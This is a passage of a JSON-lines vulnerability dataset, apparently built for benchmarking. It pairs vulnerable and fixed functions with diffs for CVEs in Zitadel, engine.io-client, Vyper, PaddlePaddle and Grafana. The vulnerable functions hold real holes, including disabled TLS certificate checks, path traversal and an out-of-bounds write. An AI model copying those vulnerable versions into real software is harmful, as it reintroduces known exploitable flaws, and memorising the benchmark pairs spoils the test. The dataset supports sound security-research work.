user.ResourceOwner)\n\t\treturn nil\n\t}\n\t// the user was either not found or not active\n\t// so check if the loginname suffix matches a verified org domain\n\t// but only if no org was requested (by id or domain)\n\tif request.RequestedOrgID == \"\" {\n\t\tok, errDomainDiscovery := repo.checkDomainDiscovery(ctx, request, loginNameInput)\n\t\tif errDomainDiscovery != nil || ok {\n\t\t\treturn errDomainDiscovery\n\t\t}\n\t}\n\t// let's once again check if the user was just inactive\n\tif 
user != nil && user.State == int32(domain.UserStateInactive) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-2n8fs\", \"Errors.User.Inactive\")\n\t}\n\t// or locked\n\tif user != nil && user.State == int32(domain.UserStateLocked) {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-SF3gb\", \"Errors.User.Locked\")\n\t}\n\t// let's just check if unknown usernames are ignored\n\tif request.LoginPolicy != nil && request.LoginPolicy.IgnoreUnknownUsernames {\n\t\tif request.LabelPolicy != nil && request.LabelPolicy.HideLoginNameSuffix {\n\t\t\tpreferredLoginName = loginNameInput\n\t\t}\n\t\trequest.SetUserInfo(unknownUserID, preferredLoginName, preferredLoginName, preferredLoginName, \"\", request.RequestedOrgID)\n\t\treturn nil\n\t}\n\t// there was no policy that allowed unknown loginnames in any case\n\t// so not found errors can now be returned\n\tif err != nil {\n\t\treturn err\n\t}\n\t// let's check if it was a machine user\n\tif !user.MachineView.IsZero() {\n\t\treturn zerrors.ThrowPreconditionFailed(nil, \"AUTH-DGV4g\", \"Errors.User.NotHuman\")\n\t}\n\t// everything should be handled by now\n\tlogging.WithFields(\"authRequest\", request.ID, \"loginName\", loginNameInput).Error(\"unhandled state for checkLoginName\")\n\treturn zerrors.ThrowInternal(nil, \"AUTH-asf3df\", \"Errors.Internal\")\n}"}, {"id": "fix_go_289_2", "commit": "14de8ecac2afafee4975ed7ac26f3ca4a2b0f82c", "file_path": "internal/auth/repository/eventsourcing/eventstore/auth_request.go", "start_line": 1037, "end_line": 1158, "snippet": "func (repo *AuthRequestRepo) nextSteps(ctx context.Context, request *domain.AuthRequest, checkLoggedIn bool) (steps []domain.NextStep, err error) {\n\tctx, span := tracing.NewSpan(ctx)\n\tdefer func() { span.EndWithError(err) }()\n\n\tif request == nil {\n\t\treturn nil, zerrors.ThrowInvalidArgument(nil, \"EVENT-ds27a\", \"Errors.Internal\")\n\t}\n\tsteps = make([]domain.NextStep, 0)\n\tif !checkLoggedIn && domain.IsPrompt(request.Prompt, domain.PromptNone) {\n\t\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n\t}\n\tif request.UserID == \"\" {\n\t\tsteps, err = repo.nextStepsUser(ctx, request)\n\t\tif err != nil || len(steps) > 0 {\n\t\t\treturn steps, err\n\t\t}\n\t}\n\tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\trequest.SessionID = userSession.ID\n\trequest.DisplayName = userSession.DisplayName\n\trequest.AvatarKey = userSession.AvatarKey\n\tif user.HumanView != nil && user.HumanView.PreferredLanguage != \"\" {\n\t\trequest.PreferredLanguage = gu.Ptr(language.Make(user.HumanView.PreferredLanguage))\n\t}\n\n\tisInternalLogin := (request.SelectedIDPConfigID == \"\" && userSession.SelectedIDPConfigID == \"\") || request.RequestLocalAuth\n\tidps, err := checkExternalIDPsOfUser(ctx, repo.IDPUserLinksProvider, user.ID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tnoLocalAuth := request.LoginPolicy != nil && !request.LoginPolicy.AllowUsernamePassword\n\n\tallowedLinkedIDPs := checkForAllowedIDPs(request.AllowedExternalIDPs, idps.Links)\n\tif (!isInternalLogin || len(allowedLinkedIDPs) > 0 || noLocalAuth) &&\n\t\tlen(request.LinkingUsers) == 0 &&\n\t\t!request.RequestLocalAuth {\n\t\tstep, err := 
repo.idpChecked(request, allowedLinkedIDPs, userSession)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\tif isInternalLogin || (!isInternalLogin && len(request.LinkingUsers) > 0) {\n\t\tstep := repo.firstFactorChecked(ctx, request, user, userSession)\n\t\tif step != nil {\n\t\t\treturn append(steps, step), nil\n\t\t}\n\t}\n\n\t// If the user never had a verified email, we need to verify it.\n\t// This prevents situations, where OTP email is the only MFA method and no verified email is set.\n\t// If the user had a verified email, but change it and has not yet verified the new one, we'll verify it after we checked the MFA methods.\n\tif user.VerifiedEmail == \"\" && !user.IsEmailVerified {\n\t\treturn append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t}), nil\n\t}\n\n\tstep, ok, err := repo.mfaChecked(userSession, request, user, isInternalLogin && len(request.LinkingUsers) == 0)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif !ok {\n\t\treturn append(steps, step), nil\n\t}\n\n\texpired := passwordAgeChangeRequired(request.PasswordAgePolicy, user.PasswordChanged)\n\tif expired || user.PasswordChangeRequired {\n\t\tsteps = append(steps, &domain.ChangePasswordStep{Expired: expired})\n\t}\n\tif !user.IsEmailVerified {\n\t\tsteps = append(steps, &domain.VerifyEMailStep{\n\t\t\tInitPassword: !user.PasswordSet && len(idps.Links) == 0,\n\t\t})\n\t}\n\tif user.UsernameChangeRequired {\n\t\tsteps = append(steps, &domain.ChangeUsernameStep{})\n\t}\n\n\tif expired || user.PasswordChangeRequired || !user.IsEmailVerified || user.UsernameChangeRequired {\n\t\treturn steps, nil\n\t}\n\n\tif request.LinkingUsers != nil && len(request.LinkingUsers) != 0 {\n\t\treturn append(steps, &domain.LinkUsersStep{}), nil\n\t}\n\t//PLANNED: consent step\n\n\tmissing, err := projectRequired(ctx, request, repo.ProjectProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.ProjectRequiredStep{}), nil\n\t}\n\n\tmissing, err = userGrantRequired(ctx, request, user, repo.UserGrantProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif missing {\n\t\treturn append(steps, &domain.GrantRequiredStep{}), nil\n\t}\n\n\tok, err = repo.hasSucceededPage(ctx, request, repo.ApplicationProvider)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif ok {\n\t\tsteps = append(steps, &domain.LoginSucceededStep{})\n\t}\n\treturn append(steps, &domain.RedirectToCallbackStep{}), nil\n}"}], "vul_patch": "--- a/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n+++ b/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n@@ -22,7 +22,7 @@\n \t}\n \t// if there's an active (human) user, let's use it\n \tif user != nil && !user.HumanView.IsZero() && domain.UserState(user.State).IsEnabled() {\n-\t\trequest.SetUserInfo(user.ID, loginNameInput, user.PreferredLoginName, \"\", \"\", user.ResourceOwner)\n+\t\trequest.SetUserInfo(user.ID, loginNameInput, preferredLoginName, \"\", \"\", user.ResourceOwner)\n \t\treturn nil\n \t}\n \t// the user was either not found or not active\n\n--- a/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n+++ b/internal/auth/repository/eventsourcing/eventstore/auth_request.go\n@@ -18,9 +18,6 @@\n \tuser, err := activeUserByID(ctx, repo.UserViewProvider, repo.UserEventProvider, repo.OrgViewProvider, repo.LockoutPolicyViewProvider, request.UserID, request.LoginPolicy.IgnoreUnknownUsernames)\n \tif 
err != nil {\n \t\treturn nil, err\n-\t}\n-\tif user.PreferredLoginName != \"\" {\n-\t\trequest.LoginName = user.PreferredLoginName\n \t}\n \tuserSession, err := userSessionByIDs(ctx, repo.UserSessionViewProvider, repo.UserEventProvider, request.AgentID, user)\n \tif err != nil {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10536", "cve_description": "engine.io-client is the client for engine.io, the implementation of a transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. The vulnerability is related to the way that node.js handles the `rejectUnauthorized` setting. If the value is something that evaluates to false, certificate verification will be disabled. This is problematic as engine.io-client 1.6.8 and earlier passes in an object for settings that includes the rejectUnauthorized property, whether it has been set or not. If the value has not been explicitly changed, it will be passed in as `null`, resulting in certificate verification being turned off.", "cwe_info": {"CWE-295": {"name": "Improper Certificate Validation", "description": "The product does not validate, or incorrectly validates, a certificate."}}, "repo": "https://github.com/socketio/engine.io-client", "patch_url": ["https://github.com/socketio/engine.io-client/commit/2c55b278a491bf45313ecc0825cf800e2f7ff5c1"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_78_1", "commit": "6045ccf", "file_path": "lib/socket.js", "start_line": "28", "end_line": "104", "snippet": "function Socket (uri, opts) {\n if (!(this instanceof Socket)) return new Socket(uri, opts);\n\n opts = opts || {};\n\n if (uri && 'object' === typeof uri) {\n opts = uri;\n uri = null;\n }\n\n if (uri) {\n uri = parseuri(uri);\n opts.hostname = uri.host;\n opts.secure = uri.protocol === 'https' || uri.protocol === 'wss';\n opts.port = uri.port;\n if (uri.query) opts.query = uri.query;\n } else if (opts.host) {\n opts.hostname = parseuri(opts.host).host;\n }\n\n this.secure = null != opts.secure ? opts.secure\n : (global.location && 'https:' === location.protocol);\n\n if (opts.hostname && !opts.port) {\n // if no port is specified manually, use the protocol default\n opts.port = this.secure ? '443' : '80';\n }\n\n this.agent = opts.agent || false;\n this.hostname = opts.hostname ||\n (global.location ? location.hostname : 'localhost');\n this.port = opts.port || (global.location && location.port\n ? location.port\n : (this.secure ? 443 : 80));\n this.query = opts.query || {};\n if ('string' === typeof this.query) this.query = parseqs.decode(this.query);\n this.upgrade = false !== opts.upgrade;\n this.path = (opts.path || '/engine.io').replace(/\\/$/, '') + '/';\n this.forceJSONP = !!opts.forceJSONP;\n this.jsonp = false !== opts.jsonp;\n this.forceBase64 = !!opts.forceBase64;\n this.enablesXDR = !!opts.enablesXDR;\n this.timestampParam = opts.timestampParam || 't';\n this.timestampRequests = opts.timestampRequests;\n this.transports = opts.transports || ['polling', 'websocket'];\n this.readyState = '';\n this.writeBuffer = [];\n this.policyPort = opts.policyPort || 843;\n this.rememberUpgrade = opts.rememberUpgrade || false;\n this.binaryType = null;\n this.onlyBinaryUpgrades = opts.onlyBinaryUpgrades;\n this.perMessageDeflate = false !== opts.perMessageDeflate ? 
(opts.perMessageDeflate || {}) : false;\n\n if (true === this.perMessageDeflate) this.perMessageDeflate = {};\n if (this.perMessageDeflate && null == this.perMessageDeflate.threshold) {\n this.perMessageDeflate.threshold = 1024;\n }\n\n // SSL options for Node.js client\n this.pfx = opts.pfx || null;\n this.key = opts.key || null;\n this.passphrase = opts.passphrase || null;\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? null : opts.rejectUnauthorized;\n\n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n if (freeGlobal.global === freeGlobal) {\n if (opts.extraHeaders && Object.keys(opts.extraHeaders).length > 0) {\n this.extraHeaders = opts.extraHeaders;\n }\n }\n\n this.open();\n}"}], "fix_func": [{"id": "fix_js_78_1", "commit": "2c55b27", "file_path": "lib/socket.js", "start_line": "28", "end_line": "104", "snippet": "function Socket (uri, opts) {\n if (!(this instanceof Socket)) return new Socket(uri, opts);\n\n opts = opts || {};\n\n if (uri && 'object' === typeof uri) {\n opts = uri;\n uri = null;\n }\n\n if (uri) {\n uri = parseuri(uri);\n opts.hostname = uri.host;\n opts.secure = uri.protocol === 'https' || uri.protocol === 'wss';\n opts.port = uri.port;\n if (uri.query) opts.query = uri.query;\n } else if (opts.host) {\n opts.hostname = parseuri(opts.host).host;\n }\n\n this.secure = null != opts.secure ? opts.secure\n : (global.location && 'https:' === location.protocol);\n\n if (opts.hostname && !opts.port) {\n // if no port is specified manually, use the protocol default\n opts.port = this.secure ? '443' : '80';\n }\n\n this.agent = opts.agent || false;\n this.hostname = opts.hostname ||\n (global.location ? location.hostname : 'localhost');\n this.port = opts.port || (global.location && location.port\n ? location.port\n : (this.secure ? 443 : 80));\n this.query = opts.query || {};\n if ('string' === typeof this.query) this.query = parseqs.decode(this.query);\n this.upgrade = false !== opts.upgrade;\n this.path = (opts.path || '/engine.io').replace(/\\/$/, '') + '/';\n this.forceJSONP = !!opts.forceJSONP;\n this.jsonp = false !== opts.jsonp;\n this.forceBase64 = !!opts.forceBase64;\n this.enablesXDR = !!opts.enablesXDR;\n this.timestampParam = opts.timestampParam || 't';\n this.timestampRequests = opts.timestampRequests;\n this.transports = opts.transports || ['polling', 'websocket'];\n this.readyState = '';\n this.writeBuffer = [];\n this.policyPort = opts.policyPort || 843;\n this.rememberUpgrade = opts.rememberUpgrade || false;\n this.binaryType = null;\n this.onlyBinaryUpgrades = opts.onlyBinaryUpgrades;\n this.perMessageDeflate = false !== opts.perMessageDeflate ? (opts.perMessageDeflate || {}) : false;\n\n if (true === this.perMessageDeflate) this.perMessageDeflate = {};\n if (this.perMessageDeflate && null == this.perMessageDeflate.threshold) {\n this.perMessageDeflate.threshold = 1024;\n }\n\n // SSL options for Node.js client\n this.pfx = opts.pfx || null;\n this.key = opts.key || null;\n this.passphrase = opts.passphrase || null;\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? 
true : opts.rejectUnauthorized;\n\n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n if (freeGlobal.global === freeGlobal) {\n if (opts.extraHeaders && Object.keys(opts.extraHeaders).length > 0) {\n this.extraHeaders = opts.extraHeaders;\n }\n }\n\n this.open();\n}"}], "vul_patch": "--- a/lib/socket.js\n+++ b/lib/socket.js\n@@ -63,7 +63,7 @@\n this.cert = opts.cert || null;\n this.ca = opts.ca || null;\n this.ciphers = opts.ciphers || null;\n- this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? null : opts.rejectUnauthorized;\n+ this.rejectUnauthorized = opts.rejectUnauthorized === undefined ? true : opts.rejectUnauthorized;\n \n // other options for Node.js client\n var freeGlobal = typeof global === 'object' && global;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-22419", "cve_description": "Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in 0.4.0.", "cwe_info": {"CWE-787": {"name": "Out-of-bounds Write", "description": "The product writes data past the end, or before the beginning, of the intended buffer."}}, "repo": "https://github.com/vyperlang/vyper", "patch_url": ["https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_429_1", "commit": "56b0d4f", "file_path": "vyper/builtins/functions.py", "start_line": 530, "end_line": 589, "snippet": " def build_IR(self, expr, context):\n args = [Expr(arg, context).ir_node for arg in expr.args]\n if len(args) < 2:\n raise StructureException(\"Concat expects at least two arguments\", expr)\n\n # Maximum length of the output\n dst_maxlen = sum(\n [arg.typ.maxlen if isinstance(arg.typ, _BytestringT) else arg.typ.m for arg in args]\n )\n\n # TODO: try to grab these from semantic analysis\n if isinstance(args[0].typ, StringT):\n ret_typ = StringT(dst_maxlen)\n else:\n ret_typ = BytesT(dst_maxlen)\n\n # Node representing the position of the output in memory\n dst = IRnode.from_list(\n context.new_internal_variable(ret_typ),\n typ=ret_typ,\n location=MEMORY,\n annotation=\"concat destination\",\n )\n\n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n ofst = \"concat_ofst\"\n\n # TODO: optimize for the case where all lengths are statically known.\n for arg in args:\n dst_data = add_ofst(bytes_data_ptr(dst), ofst)\n\n if isinstance(arg.typ, _BytestringT):\n # Ignore empty strings\n if arg.typ.maxlen == 0:\n continue\n\n with arg.cache_when_complex(\"arg\") as (b1, arg):\n argdata = bytes_data_ptr(arg)\n\n with get_bytearray_length(arg).cache_when_complex(\"len\") as (b2, arglen):\n do_copy = [\n \"seq\",\n copy_bytes(dst_data, argdata, arglen, arg.typ.maxlen),\n 
[\"set\", ofst, [\"add\", ofst, arglen]],\n ]\n ret.append(b1.resolve(b2.resolve(do_copy)))\n\n else:\n ret.append(STORE(dst_data, unwrap_location(arg)))\n ret.append([\"set\", ofst, [\"add\", ofst, arg.typ.m]])\n\n ret.append(STORE(dst, ofst))\n\n # Memory location of the output\n ret.append(dst)\n\n return IRnode.from_list(\n [\"with\", ofst, 0, ret], typ=ret_typ, location=MEMORY, annotation=\"concat\"\n )"}], "fix_func": [{"id": "fix_py_429_1", "commit": "55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f", "file_path": "vyper/builtins/functions.py", "start_line": 530, "end_line": 588, "snippet": " def build_IR(self, expr, context):\n args = [Expr(arg, context).ir_node for arg in expr.args]\n if len(args) < 2:\n raise StructureException(\"Concat expects at least two arguments\", expr)\n\n # Maximum length of the output\n dst_maxlen = sum(\n [arg.typ.maxlen if isinstance(arg.typ, _BytestringT) else arg.typ.m for arg in args]\n )\n\n # TODO: try to grab these from semantic analysis\n if isinstance(args[0].typ, StringT):\n ret_typ = StringT(dst_maxlen)\n else:\n ret_typ = BytesT(dst_maxlen)\n\n # respect API of copy_bytes\n bufsize = dst_maxlen + 32\n buf = context.new_internal_variable(BytesT(bufsize))\n\n # Node representing the position of the output in memory\n dst = IRnode.from_list(buf, typ=ret_typ, location=MEMORY, annotation=\"concat destination\")\n\n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n ofst = \"concat_ofst\"\n\n # TODO: optimize for the case where all lengths are statically known.\n for arg in args:\n dst_data = add_ofst(bytes_data_ptr(dst), ofst)\n\n if isinstance(arg.typ, _BytestringT):\n # Ignore empty strings\n if arg.typ.maxlen == 0:\n continue\n\n with arg.cache_when_complex(\"arg\") as (b1, arg):\n argdata = bytes_data_ptr(arg)\n\n with get_bytearray_length(arg).cache_when_complex(\"len\") as (b2, arglen):\n do_copy = [\n \"seq\",\n copy_bytes(dst_data, argdata, arglen, arg.typ.maxlen),\n [\"set\", ofst, [\"add\", ofst, arglen]],\n ]\n ret.append(b1.resolve(b2.resolve(do_copy)))\n\n else:\n ret.append(STORE(dst_data, unwrap_location(arg)))\n ret.append([\"set\", ofst, [\"add\", ofst, arg.typ.m]])\n\n ret.append(STORE(dst, ofst))\n\n # Memory location of the output\n ret.append(dst)\n\n return IRnode.from_list(\n [\"with\", ofst, 0, ret], typ=ret_typ, location=MEMORY, annotation=\"concat\"\n )"}], "vul_patch": "--- a/vyper/builtins/functions.py\n+++ b/vyper/builtins/functions.py\n@@ -14,13 +14,12 @@\n else:\n ret_typ = BytesT(dst_maxlen)\n \n+ # respect API of copy_bytes\n+ bufsize = dst_maxlen + 32\n+ buf = context.new_internal_variable(BytesT(bufsize))\n+\n # Node representing the position of the output in memory\n- dst = IRnode.from_list(\n- context.new_internal_variable(ret_typ),\n- typ=ret_typ,\n- location=MEMORY,\n- annotation=\"concat destination\",\n- )\n+ dst = IRnode.from_list(buf, typ=ret_typ, location=MEMORY, annotation=\"concat destination\")\n \n ret = [\"seq\"]\n # stack item representing our current offset in the dst buffer\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-0818", "cve_description": "Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The 
product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/PaddlePaddle/Paddle", "patch_url": ["https://github.com/PaddlePaddle/Paddle/commit/5c50d1a8b97b310cbc36560ec36d8377d6f29d7c"], "programing_language": "Python", "vul_func": [{"id": "vul_py_110_1", "commit": "62a1261", "file_path": "python/paddle/dataset/common.py", "start_line": 73, "end_line": 133, "snippet": "def download(url, module_name, md5sum, save_name=None):\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n filename = os.path.join(\n dirname, url.split('/')[-1] if save_name is None else save_name\n )\n\n if os.path.exists(filename) and md5file(filename) == md5sum:\n return filename\n\n retry = 0\n retry_limit = 3\n while not (os.path.exists(filename) and md5file(filename) == md5sum):\n if os.path.exists(filename):\n sys.stderr.write(f\"file {md5file(filename)} md5 {md5sum}\\n\")\n if retry < retry_limit:\n retry += 1\n else:\n raise RuntimeError(\n f\"Cannot download {url} within retry limit {retry_limit}\"\n )\n sys.stderr.write(\n f\"Cache file {filename} not found, downloading {url} \\n\"\n )\n sys.stderr.write(\"Begin to download\\n\")\n try:\n # (risemeup1):use httpx to replace requests\n with httpx.stream(\n \"GET\", url, timeout=None, follow_redirects=True\n ) as r:\n total_length = r.headers.get('content-length')\n if total_length is None:\n with open(filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n else:\n with open(filename, 'wb') as f:\n chunk_size = 4096\n total_length = int(total_length)\n total_iter = total_length / chunk_size + 1\n log_interval = (\n total_iter // 20 if total_iter > 20 else 1\n )\n log_index = 0\n bar = paddle.hapi.progressbar.ProgressBar(\n total_iter, name='item'\n )\n for data in r.iter_bytes(chunk_size=chunk_size):\n f.write(data)\n log_index += 1\n bar.update(log_index, {})\n if log_index % log_interval == 0:\n bar.update(log_index)\n\n except Exception as e:\n # re-try\n continue\n sys.stderr.write(\"\\nDownload finished\\n\")\n sys.stdout.flush()\n return filename"}], "fix_func": [{"id": "fix_py_110_1", "commit": "5c50d1a", "file_path": "python/paddle/dataset/common.py", "start_line": 74, "end_line": 139, "snippet": "def download(url, module_name, md5sum, save_name=None):\n module_name = re.match(\"^[a-zA-Z0-9_/\\\\-]+$\", module_name).group()\n if isinstance(save_name, str):\n save_name = re.match(\n \"^(?:(?!\\\\.\\\\.)[a-zA-Z0-9_/\\\\.-])+$\", save_name\n ).group()\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n filename = os.path.join(\n dirname, url.split('/')[-1] if save_name is None else save_name\n )\n\n if os.path.exists(filename) and md5file(filename) == md5sum:\n return filename\n\n retry = 0\n retry_limit = 3\n while not (os.path.exists(filename) and md5file(filename) == md5sum):\n if os.path.exists(filename):\n sys.stderr.write(f\"file {md5file(filename)} md5 {md5sum}\\n\")\n if retry < retry_limit:\n retry += 1\n else:\n raise RuntimeError(\n f\"Cannot download {url} within retry limit {retry_limit}\"\n )\n sys.stderr.write(\n f\"Cache file {filename} not found, downloading {url} \\n\"\n )\n sys.stderr.write(\"Begin to download\\n\")\n 
try:\n # (risemeup1):use httpx to replace requests\n with httpx.stream(\n \"GET\", url, timeout=None, follow_redirects=True\n ) as r:\n total_length = r.headers.get('content-length')\n if total_length is None:\n with open(filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n else:\n with open(filename, 'wb') as f:\n chunk_size = 4096\n total_length = int(total_length)\n total_iter = total_length / chunk_size + 1\n log_interval = (\n total_iter // 20 if total_iter > 20 else 1\n )\n log_index = 0\n bar = paddle.hapi.progressbar.ProgressBar(\n total_iter, name='item'\n )\n for data in r.iter_bytes(chunk_size=chunk_size):\n f.write(data)\n log_index += 1\n bar.update(log_index, {})\n if log_index % log_interval == 0:\n bar.update(log_index)\n\n except Exception as e:\n # re-try\n continue\n sys.stderr.write(\"\\nDownload finished\\n\")\n sys.stdout.flush()\n return filename"}], "vul_patch": "--- a/python/paddle/dataset/common.py\n+++ b/python/paddle/dataset/common.py\n@@ -1,4 +1,9 @@\n def download(url, module_name, md5sum, save_name=None):\n+ module_name = re.match(\"^[a-zA-Z0-9_/\\\\-]+$\", module_name).group()\n+ if isinstance(save_name, str):\n+ save_name = re.match(\n+ \"^(?:(?!\\\\.\\\\.)[a-zA-Z0-9_/\\\\.-])+$\", save_name\n+ ).group()\n dirname = os.path.join(DATA_HOME, module_name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-43798", "cve_description": "Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `/public/plugins/<plugin-id>/`, where <plugin-id> is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. 
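Illustrative aside (not part of the record): the Grafana fix shown below neutralizes traversal by joining the requested file to "/", cleaning the result, and then taking it relative to "/" again, so ".." segments cannot climb out of the plugin directory. A minimal Python rendering of the same idea; the names here are hypothetical:

import posixpath

def safe_plugin_path(plugin_dir, requested):
    # Joining to "/" before normalizing pins any "../" run at the root...
    cleaned = posixpath.normpath(posixpath.join("/", requested))
    # ...so the path taken relative to "/" can no longer contain "..".
    rel = posixpath.relpath(cleaned, "/")
    return posixpath.join(plugin_dir, rel)

assert safe_plugin_path("/plugins/foo", "img/logo.png") == "/plugins/foo/img/logo.png"
# A traversal attempt is clamped instead of escaping the directory:
assert safe_plugin_path("/plugins/foo", "../../etc/passwd") == "/plugins/foo/etc/passwd"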
The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/grafana/grafana", "patch_url": ["https://github.com/grafana/grafana/commit/c798c0e958d15d9cc7f27c72113d572fa58545ce"], "programing_language": "Go", "vul_func": [{"id": "vul_go_13_1", "commit": "a2ad0a0", "file_path": "pkg/api/plugins.go", "start_line": 284, "end_line": 331, "snippet": "func (hs *HTTPServer) getPluginAssets(c *models.ReqContext) {\n\tpluginID := web.Params(c.Req)[\":pluginId\"]\n\tplugin, exists := hs.pluginStore.Plugin(c.Req.Context(), pluginID)\n\tif !exists {\n\t\tc.JsonApiErr(404, \"Plugin not found\", nil)\n\t\treturn\n\t}\n\n\trequestedFile := filepath.Clean(web.Params(c.Req)[\"*\"])\n\tpluginFilePath := filepath.Join(plugin.PluginDir, requestedFile)\n\n\tif !plugin.IncludedInSignature(requestedFile) {\n\t\ths.log.Warn(\"Access to requested plugin file will be forbidden in upcoming Grafana versions as the file \"+\n\t\t\t\"is not included in the plugin signature\", \"file\", requestedFile)\n\t}\n\n\t// It's safe to ignore gosec warning G304 since we already clean the requested file path and subsequently\n\t// use this with a prefix of the plugin's directory, which is set during plugin loading\n\t// nolint:gosec\n\tf, err := os.Open(pluginFilePath)\n\tif err != nil {\n\t\tif os.IsNotExist(err) {\n\t\t\tc.JsonApiErr(404, \"Plugin file not found\", err)\n\t\t\treturn\n\t\t}\n\t\tc.JsonApiErr(500, \"Could not open plugin file\", err)\n\t\treturn\n\t}\n\tdefer func() {\n\t\tif err := f.Close(); err != nil {\n\t\t\ths.log.Error(\"Failed to close file\", \"err\", err)\n\t\t}\n\t}()\n\n\tfi, err := f.Stat()\n\tif err != nil {\n\t\tc.JsonApiErr(500, \"Plugin file exists but could not open\", err)\n\t\treturn\n\t}\n\n\tif hs.Cfg.Env == setting.Dev {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"max-age=0, must-revalidate, no-cache\")\n\t} else {\n\t\tc.Resp.Header().Set(\"Cache-Control\", \"public, max-age=3600\")\n\t}\n\n\thttp.ServeContent(c.Resp, c.Req, pluginFilePath, fi.ModTime(), f)\n}"}], "fix_func": [{"id": "fix_go_13_1", "commit": "c798c0e", "file_path": "pkg/api/plugins.go", "start_line": 284, "end_line": 344, "snippet": "func (hs *HTTPServer) getPluginAssets(c *models.ReqContext) {\n\tpluginID := web.Params(c.Req)[\":pluginId\"]\n\tplugin, exists := hs.pluginStore.Plugin(c.Req.Context(), pluginID)\n\tif !exists {\n\t\tc.JsonApiErr(404, \"Plugin not found\", nil)\n\t\treturn\n\t}\n\n\t// prepend slash for cleaning relative paths\n\trequestedFile := filepath.Clean(filepath.Join(\"/\", web.Params(c.Req)[\"*\"]))\n\trel, err := filepath.Rel(\"/\", requestedFile)\n\tif err != nil {\n\t\t// slash is prepended above therefore this is not expected to fail\n\t\tc.JsonApiErr(500, \"Failed to get the relative path\", err)\n\t\treturn\n\t}\n\n\tif 
